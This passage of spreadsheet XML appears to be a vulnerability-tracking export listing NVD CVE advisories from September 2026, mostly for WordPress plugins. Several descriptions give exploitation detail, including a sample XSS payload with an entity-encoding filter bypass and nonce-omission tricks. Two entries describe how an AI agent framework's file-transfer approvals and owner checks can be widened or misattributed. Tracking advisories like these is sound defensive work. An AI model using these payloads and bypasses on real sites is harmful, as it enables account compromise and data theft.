        <is>
          <t>CVE-2026-92573</t>
        </is>
      </c>
      <c r="D257" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E257" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F257" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G257" s="5" t="inlineStr"/>
      <c r="H257" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I257" s="5" t="inlineStr"/>
      <c r="J257" s="5" t="inlineStr"/>
      <c r="K257" s="5" t="inlineStr"/>
      <c r="L257" s="5" t="inlineStr"/>
      <c r="M257" s="5" t="inlineStr"/>
      <c r="N257" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O257" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P257" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q257" s="5" t="inlineStr"/>
      <c r="R257" s="5" t="inlineStr">
        <is>
          <t>CWE-409</t>
        </is>
      </c>
      <c r="S257" s="5" t="inlineStr">
        <is>
          <t>Improper handling of compressed data in the shared GZIP decompressor used for AMQP 0-8/0-9/0-9-1 and AMQP 0-10 message delivery, message conversion and HTTP management JSON rendering allows authenticated message producers to exhaust memory and disrupt broker availability via processing without a decompressed-output limit.
This issue affects Apache Qpid Broker-J: through 10.1.0.
Users are recommended to upgrade to version 10.1.1, which fixes the issue.</t>
        </is>
      </c>
      <c r="T257" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92573</t>
        </is>
      </c>
    </row>
    <row r="258">
      <c r="A258" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B258" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C258" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93030</t>
        </is>
      </c>
      <c r="D258" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E258" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F258" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G258" s="5" t="inlineStr"/>
      <c r="H258" s="5" t="inlineStr"/>
      <c r="I258" s="5" t="inlineStr"/>
      <c r="J258" s="5" t="inlineStr"/>
      <c r="K258" s="5" t="inlineStr"/>
      <c r="L258" s="5" t="inlineStr"/>
      <c r="M258" s="5" t="inlineStr"/>
      <c r="N258" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O258" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P258" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q258" s="5" t="inlineStr"/>
      <c r="R258" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="S258" s="5" t="inlineStr">
        <is>
          <t>FTM 4.x ALL could allow a remote authenticated attacker to obtain sensitive information due to an XML external entity injection flaw.</t>
        </is>
      </c>
      <c r="T258" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93030</t>
        </is>
      </c>
    </row>
    <row r="259">
      <c r="A259" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B259" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C259" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93899</t>
        </is>
      </c>
      <c r="D259" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E259" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F259" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G259" s="5" t="inlineStr"/>
      <c r="H259" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I259" s="5" t="inlineStr"/>
      <c r="J259" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K259" s="5" t="inlineStr"/>
      <c r="L259" s="5" t="inlineStr"/>
      <c r="M259" s="5" t="inlineStr"/>
      <c r="N259" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O259" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P259" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q259" s="5" t="inlineStr"/>
      <c r="R259" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S259" s="5" t="inlineStr">
        <is>
          <t>The Better Messages – Chat Rooms, Group Chat, Private Messages &amp; AI Chat Bots plugin for WordPress is vulnerable to generic SQL Injection via 'group_id' Message Meta Parameter in all versions up to, and including, 3.0.4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 Exploitation requires the BuddyBoss Platform plugin to be installed with its Social Groups component disabled, a state that persists on any site that has previously toggled the Groups component off since BuddyBoss does not drop the wp_bp_groups table upon deactivation.</t>
        </is>
      </c>
      <c r="T259" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93899</t>
        </is>
      </c>
    </row>
    <row r="260">
      <c r="A260" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B260" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C260" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100529</t>
        </is>
      </c>
      <c r="D260" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E260" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F260" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G260" s="5" t="inlineStr"/>
      <c r="H260" s="5" t="inlineStr"/>
      <c r="I260" s="5" t="inlineStr"/>
      <c r="J260" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K260" s="5" t="inlineStr"/>
      <c r="L260" s="5" t="inlineStr"/>
      <c r="M260" s="5" t="inlineStr"/>
      <c r="N260" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O260" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P260" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q260" s="5" t="inlineStr"/>
      <c r="R260" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S260" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions before 2026.8.1 contain an authorization scope widening vulnerability in file-transfer allow-always approvals that allows attackers to reuse standing grants for unreviewed paths. Attackers can exploit glob metacharacter interpretation and node display name reuse to access sibling paths or different nodes beyond the operator's original approval scope.</t>
        </is>
      </c>
      <c r="T260" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100529</t>
        </is>
      </c>
    </row>
    <row r="261">
      <c r="A261" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B261" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C261" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100546</t>
        </is>
      </c>
      <c r="D261" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E261" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F261" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G261" s="5" t="inlineStr"/>
      <c r="H261" s="5" t="inlineStr"/>
      <c r="I261" s="5" t="inlineStr"/>
      <c r="J261" s="5" t="inlineStr">
        <is>
          <t>npm, gin</t>
        </is>
      </c>
      <c r="K261" s="5" t="inlineStr"/>
      <c r="L261" s="5" t="inlineStr"/>
      <c r="M261" s="5" t="inlineStr"/>
      <c r="N261" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O261" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P261" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q261" s="5" t="inlineStr"/>
      <c r="R261" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="S261" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package `openclaw`) versions &gt;= 2026.7.2 and &lt; 2026.9.2 contain a race condition in the Discord realtime voice transcript path. Concurrent control-classified voice transcripts could consume speaker context belonging to another participant after an asynchronous control check, causing a transcript to inherit another speaker's owner status. In Discord agent-proxy voice sessions using the affected realtime control path, an utterance from a non-owner participant could reach the downstream agent boundary marked as owner, so owner-sensitive behavior is applied to the wrong speaker. Exploitation depends on concurrent transcript timing and on the tools and commands available to the affected agent. The issue is fixed in 2026.9.2; as a workaround, disable Discord realtime voice for agents that distinguish owner and non-owner senders.</t>
        </is>
      </c>
      <c r="T261" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100546</t>
        </is>
      </c>
    </row>
    <row r="262">
      <c r="A262" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B262" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C262" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13179</t>
        </is>
      </c>
      <c r="D262" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E262" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F262" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G262" s="5" t="inlineStr"/>
      <c r="H262" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I262" s="5" t="inlineStr"/>
      <c r="J262" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K262" s="5" t="inlineStr"/>
      <c r="L262" s="5" t="inlineStr"/>
      <c r="M262" s="5" t="inlineStr"/>
      <c r="N262" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O262" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P262" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q262" s="5" t="inlineStr"/>
      <c r="R262" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S262" s="5" t="inlineStr">
        <is>
          <t>The WP Maps – Google Maps,OpenStreetMap,Mapbox,Store Locator,Listing,Directory &amp; Filters plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shapes_values Parameter in all versions up to, and including, 4.9.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The fc-call-nonce nonce required by the endpoint is exposed to all frontend visitors who view a map page via window.wpgmp_local.nonce, enabling any authenticated subscriber to read the nonce and craft a valid request; additionally, the secondary _wpnonce check in the drawing handler can be bypassed by simply omitting the _wpnonce parameter from the request.</t>
        </is>
      </c>
      <c r="T262" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13179</t>
        </is>
      </c>
    </row>
    <row r="263">
      <c r="A263" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B263" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C263" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15273</t>
        </is>
      </c>
      <c r="D263" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E263" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F263" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G263" s="5" t="inlineStr"/>
      <c r="H263" s="5" t="inlineStr"/>
      <c r="I263" s="5" t="inlineStr"/>
      <c r="J263" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K263" s="5" t="inlineStr"/>
      <c r="L263" s="5" t="inlineStr"/>
      <c r="M263" s="5" t="inlineStr"/>
      <c r="N263" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O263" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P263" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q263" s="5" t="inlineStr"/>
      <c r="R263" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S263" s="5" t="inlineStr">
        <is>
          <t>The Automatic.css plugin for WordPress is vulnerable to Stored Cross-Site Scripting via REQUEST_URI in all version 4.0.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts that will execute whenever an administrator accesses the Activity Log settings page.</t>
        </is>
      </c>
      <c r="T263" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15273</t>
        </is>
      </c>
    </row>
    <row r="264">
      <c r="A264" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B264" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C264" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92746</t>
        </is>
      </c>
      <c r="D264" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E264" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F264" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G264" s="5" t="inlineStr"/>
      <c r="H264" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I264" s="5" t="inlineStr"/>
      <c r="J264" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K264" s="5" t="inlineStr"/>
      <c r="L264" s="5" t="inlineStr"/>
      <c r="M264" s="5" t="inlineStr"/>
      <c r="N264" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O264" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P264" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q264" s="5" t="inlineStr"/>
      <c r="R264" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S264" s="5" t="inlineStr">
        <is>
          <t>The Gutenverse – WordPress Blocks, Page Builder &amp; Site Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Post Comment Block 'suffixMain' Attribute in all versions up to, and including, 4.0.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. WordPress core wp_kses_post sanitization does not mitigate this vulnerability because the payload is stored inside a Gutenberg block delimiter comment rather than as a raw HTML tag, and is only rendered as exploitable HTML at the PHP render stage.</t>
        </is>
      </c>
      <c r="T264" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92746</t>
        </is>
      </c>
    </row>
    <row r="265">
      <c r="A265" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B265" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C265" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93656</t>
        </is>
      </c>
      <c r="D265" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E265" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F265" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G265" s="5" t="inlineStr"/>
      <c r="H265" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I265" s="5" t="inlineStr"/>
      <c r="J265" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K265" s="5" t="inlineStr"/>
      <c r="L265" s="5" t="inlineStr"/>
      <c r="M265" s="5" t="inlineStr"/>
      <c r="N265" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O265" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P265" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q265" s="5" t="inlineStr"/>
      <c r="R265" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S265" s="5" t="inlineStr">
        <is>
          <t>The User Profile Builder – Beautiful User Registration Forms, User Profiles &amp; User Role Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Avatar Field in all versions up to, and including, 4.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This is exploitable via a nonce-free GET request to /wp-admin/profile.php, requiring no profile-form submission; a Subscriber can plant the malicious attachment URL, which then executes when an administrator opens that user's Edit User screen.</t>
        </is>
      </c>
      <c r="T265" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93656</t>
        </is>
      </c>
    </row>
    <row r="266">
      <c r="A266" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B266" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C266" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93747</t>
        </is>
      </c>
      <c r="D266" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E266" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F266" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G266" s="5" t="inlineStr"/>
      <c r="H266" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I266" s="5" t="inlineStr"/>
      <c r="J266" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K266" s="5" t="inlineStr"/>
      <c r="L266" s="5" t="inlineStr"/>
      <c r="M266" s="5" t="inlineStr"/>
      <c r="N266" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O266" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P266" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q266" s="5" t="inlineStr"/>
      <c r="R266" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S266" s="5" t="inlineStr">
        <is>
          <t>The wpForo Forum plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'telegram' profile field in versions up to, and including, 3.1.6. This is due to insufficient input sanitization and output escaping in the profile_update action — the raw $_POST['data'] array is copied into a $custom_fields variable before validate() and sanitize() run, both of which operate only on a parallel $user reference, leaving $custom_fields unsanitized when it is persisted via update_custom_fields(); on render, wpforo_decode() reverses the entity encoding and the value is echoed without escaping in field_wrap_profile(). This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="T266" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93747</t>
        </is>
      </c>
    </row>
    <row r="267">
      <c r="A267" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B267" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C267" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93897</t>
        </is>
      </c>
      <c r="D267" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E267" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F267" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G267" s="5" t="inlineStr"/>
      <c r="H267" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I267" s="5" t="inlineStr"/>
      <c r="J267" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K267" s="5" t="inlineStr"/>
      <c r="L267" s="5" t="inlineStr"/>
      <c r="M267" s="5" t="inlineStr"/>
      <c r="N267" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O267" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P267" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q267" s="5" t="inlineStr"/>
      <c r="R267" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S267" s="5" t="inlineStr">
        <is>
          <t>The GeoDirectory – WP Business Directory Plugin and Classified Listings Directory plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Text-type Custom Field (e.g., 'phone') in all versions up to, and including, 2.8.181 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The payload must be stored in a text-type custom field (such as a phone field) via the AJAX geodir_save_post endpoint, using entity-encoded angle brackets (e.g., &amp;lt;img src=x onerror=alert(1)&amp;gt;) to bypass the strpos()-gated tag-stripping check.</t>
        </is>
      </c>
      <c r="T267" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93897</t>
        </is>
      </c>
    </row>
    <row r="268">
      <c r="A268" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B268" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C268" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94376</t>
        </is>
      </c>
      <c r="D268" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E268" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F268" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G268" s="5" t="inlineStr"/>
      <c r="H268" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I268" s="5" t="inlineStr"/>
      <c r="J268" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K268" s="5" t="inlineStr"/>
      <c r="L268" s="5" t="inlineStr"/>
      <c r="M268" s="5" t="inlineStr"/>
      <c r="N268" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O268" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P268" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q268" s="5" t="inlineStr"/>
      <c r="R268" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S268" s="5" t="inlineStr">
        <is>
          <t>The Better Messages – Chat Rooms, Group Chat, Private Messages &amp; AI Chat Bots plugin for WordPress is vulnerable to Stored DOM-Based Cross-Site Scripting via User Display Name in all versions up to, and including, 3.0.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This is exploitable by Subscriber-level users because WordPress core's sanitize_text_field() preserves HTML-entity-encoded payloads (e.g., an iframe srcdoc attribute), allowing the encoded string to be stored as a display name without requiring the unfiltered_html capability, and the plugin subsequently decodes it server-side before rendering.</t>
        </is>
      </c>
      <c r="T268" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94376</t>
        </is>
      </c>
    </row>
    <row r="269">
      <c r="A269" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B269" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C269" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96766</t>
        </is>
      </c>
      <c r="D269" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E269" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F269" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G269" s="5" t="inlineStr"/>
      <c r="H269" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I269" s="5" t="inlineStr"/>
      <c r="J269" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K269" s="5" t="inlineStr"/>
      <c r="L269" s="5" t="inlineStr"/>
      <c r="M269" s="5" t="inlineStr"/>
      <c r="N269" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O269" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P269" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q269" s="5" t="inlineStr"/>
      <c r="R269" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S269" s="5" t="inlineStr">
        <is>
          <t>The GeoDirectory – WP Business Directory Plugin and Classified Listings Directory plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'business_hours' parameter in all versions up to, and including, 2.8.183 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This is possible because the AJAX save handler validates only post authorship and a nonce with no additional capability check, allowing any subscriber-level user who owns a listing to exploit this vulnerability.</t>
        </is>
      </c>
      <c r="T269" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96766</t>
        </is>
      </c>
    </row>
    <row r="270">
      <c r="A270" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B270" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C270" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100177</t>
        </is>
      </c>
      <c r="D270" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E270" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F270" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G270" s="5" t="inlineStr"/>
      <c r="H270" s="5" t="inlineStr"/>
      <c r="I270" s="5" t="inlineStr"/>
      <c r="J270" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K270" s="5" t="inlineStr"/>
      <c r="L270" s="5" t="inlineStr"/>
      <c r="M270" s="5" t="inlineStr"/>
      <c r="N270" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O270" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P270" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q270" s="5" t="inlineStr"/>
      <c r="R270" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-639</t>
        </is>
      </c>
      <c r="S270" s="5" t="inlineStr">
        <is>
          <t>The AIL Framework crawler task creation API (api_add_crawler_task) contained an insufficient authorization check when a user supplied a cookiejar UUID to attach to a one-shot or scheduled crawler task. The original code only verified that the cookiejar existed and, if its access level was 0, compared the cookiejar's owning user ID to the requesting user ID. It did not validate organizational boundaries, did not account for the requesting user's role. When the cookiejar level was not 0, no access check was performed at all. An authenticated user could therefore reference another organization's cookiejar by UUID and have the crawler use that organization's stored cookies (session tokens, authentication credentials) when performing web crawls, effectively leaking or exfiltrating the victim organization's session data.
The vulnerability requires an authenticated user with the ability to create crawler tasks. The attacker must know or guess a valid cookiejar UUID belonging to another organization. The impact is unauthorized access to another organization's stored cookies and session data through the crawler infrastructure.</t>
        </is>
      </c>
      <c r="T270" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100177</t>
        </is>
      </c>
    </row>
    <row r="271">
      <c r="A271" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B271" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C271" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100190</t>
        </is>
      </c>
      <c r="D271" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E271" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F271" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G271" s="5" t="inlineStr"/>
      <c r="H271" s="5" t="inlineStr"/>
      <c r="I271" s="5" t="inlineStr"/>
      <c r="J271" s="5" t="inlineStr">
        <is>
          <t>gin</t>
